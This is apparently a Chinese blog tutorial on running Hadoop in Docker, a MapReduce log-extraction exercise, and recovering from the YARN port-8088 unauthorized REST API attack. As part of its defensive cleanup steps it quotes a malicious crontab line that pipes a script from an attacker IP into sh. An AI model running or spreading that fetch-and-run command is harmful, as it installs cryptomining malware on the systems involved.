hadoop快速入门---基于docker搭建hadoop环境,并且解决8088yarn漏洞问题

本节来说说如何快速使用上hadoop
安装hadoop的步骤:
1、操作系统:ubuntu16.04LTS
2、安装docker
3、利用docker安装hadoop集群环境

前言:docker是个好东西,可以减少很多配置,提高工作效率。同时,docker也是开源世界的一个比较好的产物,个人感觉将引起技术大爆发发展。

安装docker步骤:参考docker安装

基于docker安装可用的hadoop集群,参考hadoop安装

搭建好hadoop环境之后,就可以进行使用了

现在来使用hadoop解决下面这个问题

1.现有一批路由日志(有删减),需要提取MAC地址和时间,删去其它内容,利用MapReduce思想设计程序实现。
日志文件如下:
Apr 23 11:49:54 hostapd: wlan0: STA 14:7d:c5:9e:fb:84
Apr 23 11:49:52 hostapd: wlan0: STA 74:0d:45:3e:28:f2
Apr 23 11:49:50 hostapd: wlan0: STA cc:af:78:cc:d5:5d
Apr 23 11:49:44 hostapd: wlan0: STA 56:8a:3d:e2:dd:63
Apr 23 11:49:42 hostapd: wlan0: STA 32:8b:3e:45:d2:77

将日志提取出来上传到服务器中,命名为filemax.txt,使用如下命令从主机复制到容器中

docker cp filemax.txt 6938ef559b27:/root/input
//docker cp local_path 容器ID:container_path

然后将打好的jar包用相同的办法导入到容器中。
使用

//显示hadoop文件系统下的文件
hadoop fs -ls -R
//删除某个文件夹(以Output为例)
hadoop fs -rmr output```

来查看和清除当前hadoop中的冗余文件
执行jar:

#!/bin/bash

# create input directory on HDFS
hadoop fs -mkdir -p input

# put input files to HDFS
hdfs dfs -put ./input/* input

# run wordcount
hadoop jar $HADOOP_HOME/share/hadoop/mapreduce/sources/logcount.jar logcount inpp
ut output

# print the input files
echo -e "\ninput filemax.txt:"
hdfs dfs -cat input/filemax.txt

# print the output of wordcount
echo -e "\nmacselect output:"
hdfs dfs -cat output/part-r-00000

执行

bash ./run-macselect.sh

即可。
问题:
如果出现提交的任务一直处于accepted状态而不去跑。传送门1
传送门2
配置yarn相关一键跳转
问题重现与解决

2、yarn一直在跑一个用户为dr.who的application
该问题是由于yarn自身开放了没有权限控制的8088端口的rest ful接口导致的漏洞。
现象描述:

//查看yarn application 列表
yarn application -list
//例如如下结果
                Application-Id      Application-Name        Application-Type          User       Queue               State         Final-State         Progress                        Tracking-URL
application_1530927279601_0055                hadoop                    YARN        dr.who     default            ACCEPTED           UNDEFINED               0%                                 N/A
application_1530927279601_0049                hadoop                    YARN        dr.who     default            ACCEPTED           UNDEFINED               0%                                 N/A
application_1530927279601_0028                hadoop                    YARN        dr.who     default            ACCEPTED           UNDEFINED               0%                                 N/A
application_1530927279601_0052                hadoop                    YARN        dr.who     default            ACCEPTED           UNDEFINED               0%                                 N/A
application_1530927279601_0043                hadoop                    YARN        dr.who     default            ACCEPTED           UNDEFINED               0%                                 N/A
application_1530927279601_0035                hadoop                    YARN        dr.who     default            ACCEPTED           UNDEFINED               0%                                 N/A
application_1530927279601_0027                hadoop                    YARN        dr.who     default            ACCEPTED           UNDEFINED               0%                                 N/A
application_1530927279601_0041                hadoop                    YARN        dr.who     default            ACCEPTED           UNDEFINED               0%                                 N/A
application_1530927279601_0042                hadoop                    YARN        dr.who     default            ACCEPTED           UNDEFINED               0%                                 N/A
application_1530927279601_0033                hadoop                    YARN        dr.who     default            ACCEPTED           UNDEFINED               0%                                 N/A
application_1530927279601_0034                hadoop                    YARN        dr.who     default            ACCEPTED           UNDEFINED               0%                                 N/A
application_1530927279601_0056                hadoop                    YARN        dr.who     default            ACCEPTED           UNDEFINED               0%                                 N/A
application_1530927279601_0051                hadoop                    YARN        dr.who     default            ACCEPTED           UNDEFINED               0%                                 N/A
application_1530927279601_0050                hadoop                    YARN        dr.who     default            ACCEPTED           UNDEFINED               0%                                 N/A
application_1530927279601_0039                hadoop                    YARN        dr.who     default            ACCEPTED           UNDEFINED               0%                                 N/A
application_1530927279601_0031                hadoop                    YARN        dr.who     default            ACCEPTED           UNDEFINED               0%                                 N/A
application_1530927279601_0046                hadoop                    YARN        dr.who     default            ACCEPTED           UNDEFINED               0%                                 N/A
application_1530927279601_0057                hadoop                    YARN        dr.who     default            ACCEPTED           UNDEFINED               0%                                 N/A
application_1530927279601_0053                hadoop                    YARN        dr.who     default            ACCEPTED           UNDEFINED               0%                                 N/A
application_1530927279601_0040                hadoop                    YARN        dr.who     default            ACCEPTED           UNDEFINED               0%                                 N/A
application_1530927279601_0029                hadoop                    YARN        dr.who     default            ACCEPTED           UNDEFINED               0%                                 N/A
application_1530927279601_0045                hadoop                    YARN        dr.who     default            ACCEPTED           UNDEFINED               0%                                 N/A
application_1530927279601_0037                hadoop                    YARN        dr.who     default            ACCEPTED           UNDEFINED               0%                                 N/A
application_1530927279601_0048                hadoop                    YARN        dr.who     default            ACCEPTED           UNDEFINED               0%                                 N/A
application_1530927279601_0038                hadoop                    YARN        dr.who     default            ACCEPTED           UNDEFINED               0%                                 N/A
application_1530927279601_0030                hadoop                    YARN        dr.who     default            ACCEPTED           UNDEFINED               0%                                 N/A
application_1530927279601_0047                hadoop                    YARN        dr.who     default            ACCEPTED           UNDEFINED               0%                                 N/A
application_1530927279601_0036                hadoop                    YARN        dr.who     default            ACCEPTED           UNDEFINED               0%                                 N/A
application_1530927279601_0044                hadoop                    YARN        dr.who     default            ACCEPTED           UNDEFINED               0%                                 N/A
application_1530927279601_0054                hadoop                    YARN        dr.who     default            ACCEPTED           UNDEFINED               0%                                 N/A

恭喜你,你中毒了,攻击者利用Hadoop Yarn资源管理系统REST API未授权漏洞对服务器进行攻击,攻击者可以在未授权的情况下远程执行代码的安全问题进行预警
用top命令发现cpu使用了360%多,系统会很卡。
解决办法:
1,通过查看占用cpu高得进程,kill掉此进程
2,检查/tmp和/var/tmp目录,删除java、ppc、w.conf等异常文件
3 ,通过crontab -l 查看有一个* * * * * wget -q -O - http://46.249.38.186/cr.sh | sh > /dev/null 2>&1任务,删除此任务
4,排查YARN日志,确认异常的application,删除处理
再通过top验证看是否还有高cpu进程,如果有,kill掉,没有的话应该正常了。
注意:YARN提供有默认开放在8088和8090的REST API(默认前者)允许用户直接通过API进行相关的应用创建、任务提交执行等操作,如果配置不当,REST API将会开放在公网导致未授权访问的问题,那么任何黑客则就均可利用其进行远程命令执行,从而进行挖矿等行为,黑客直接利用开放在8088的REST API提交执行命令,来实现在服务器内下载执行.sh脚本,从而再进一步下载启动挖矿程序达到挖矿的目的,因此注意并启用Kerberos认证功能,禁止匿名访问修改8088端口

上面这个是大佬的方法

佛系程序猿的话,可以手动一个个删除application

yarn application -kill application_1437456051228_1725

但是你会发现,删除的速度比人家生成的速度慢一些,这就很尴尬了。然后想到通过sh脚本批处理来删除。根据用户名作为指标,或者application状态作为指标。这就交给读者自行去解决了。
查看某个application的详情

yarn  application -status application_1530927279601_0054

结果如下:

Application Report : 
    Application-Id : application_1530927279601_0054
    Application-Name : hadoop
    Application-Type : YARN
    User : dr.who
    Queue : default
    Start-Time : 1530928629413
    Finish-Time : 0
    Progress : 0%
    State : ACCEPTED
    Final-State : UNDEFINED
    Tracking-URL : N/A
    RPC Port : -1
    AM Host : N/A
    Aggregate Resource Allocation : 0 MB-seconds, 0 vcore-seconds
    Diagnostics 

可以看见这个Queue是在default里面的。
已经执行完的项目:

Application Report : 
    Application-Id : application_1530927279601_0001
    Application-Name : word count
    Application-Type : MAPREDUCE
    User : root
    Queue : default
    Start-Time : 1530927318077
    Finish-Time : 1530927336994
    Progress : 100%
    State : FINISHED
    Final-State : SUCCEEDED
    Tracking-URL : http://hadoop-slave1:19888/jobhistory/job/job_1530927279601_0001
    RPC Port : 38879
    AM Host : hadoop-slave1
    Aggregate Resource Allocation : 66867 MB-seconds, 40 vcore-seconds
    Diagnostics :

解决办法:

首先我们通过设置 iptables 把 8088 端口限制只能从办公室的 IP 访问。
然后启用Kerberos认证功能。

设置防火墙:

sudo ufw status
//结果如下
Status: active

To                         Action      From
--                         ------      ----
22/tcp                     ALLOW       Anywhere                  
8088/tcp                   ALLOW       Anywhere                  
22/tcp (v6)                ALLOW       Anywhere (v6)             
8088/tcp (v6)              ALLOW       Anywhere (v6)             

现在得把8088端口的FROM改成特定的值。试了很久发现ufw似乎不生效。

Usage: ufw COMMAND

Commands:
 enable                          enables the firewall   开启ufw防火墙
 disable                         disables the firewall  禁用防火墙
 default ARG                     set default policy 设置默认的策略
 logging LEVEL                   set logging to LEVEL   记录级别
 allow ARGS                      add allow rule     添加允许的规则  eg : ufw allow ssh
 deny ARGS                       add deny rule      添加禁止的规则  eg : ufw deny 80
 reject ARGS                     add reject rule    添加拒绝的规则 eg : ufw reject mysql
 limit ARGS                      add limit rule     添加限制的规则
 delete RULE|NUM                 delete RULE
 insert NUM RULE                 insert RULE at NUM
 route RULE                      add route RULE
 route delete RULE|NUM           delete route RULE
 route insert NUM RULE           insert route RULE at NUM
 reload                          reload firewall    重新加载防火墙(不清除规则)
 reset                           reset firewall     重置防火墙 (清除规则)
 status                          show firewall status   防火墙规则列表
 status numbered                 show firewall status as numbered list of RULES #按序号列出规则
 status verbose                  show verbose firewall status
 show ARG                        show firewall report   状态报告
 version                         display version information 展示状态信息


Application profile commands:
 app list                        list application profiles
 app info PROFILE                show information on PROFILE
 app update PROFILE              update PROFILE
 app default ARG                 set default application policy

试了几次没成功,最后我写了一个批处理脚本

#!/bin/bash
for((i=$2;i<=$3;i++));
do
if [ "$i" -lt 10 ];
then
cmd="yarn application -kill application_"$1"_000"$i
$cmd
fi
if [ "$i" -lt 100 ];
then
    if [ "$i" -gt 9 ];
    then
    cmd1="yarn application -kill application_"$1"_00"$i
    $cmd1
    fi
fi
if [ "$i" -lt 1000 ];
then
    if [ "$i" -gt 99 ];
    then
    cmd2="yarn application -kill application_"$1"_0"$i
    $cmd2
    fi
fi
done

输入以下指令执行:用于删除目前的application

./deleteyarnapp.sh 1530927279601 1 260

还有个办法是在启动容器的时候把端口映射的端口改了,这样漏洞就可以避免了。
例如:

sudo docker run -itd \
                --net=hadoop \
                -p 50070:50070 \
                -p xxxx:8088 \
                --name hadoop-master \
                --hostname hadoop-master \
                kiwenlau/hadoop:1.0 &> /dev/null

你可能感兴趣的:(hadoop)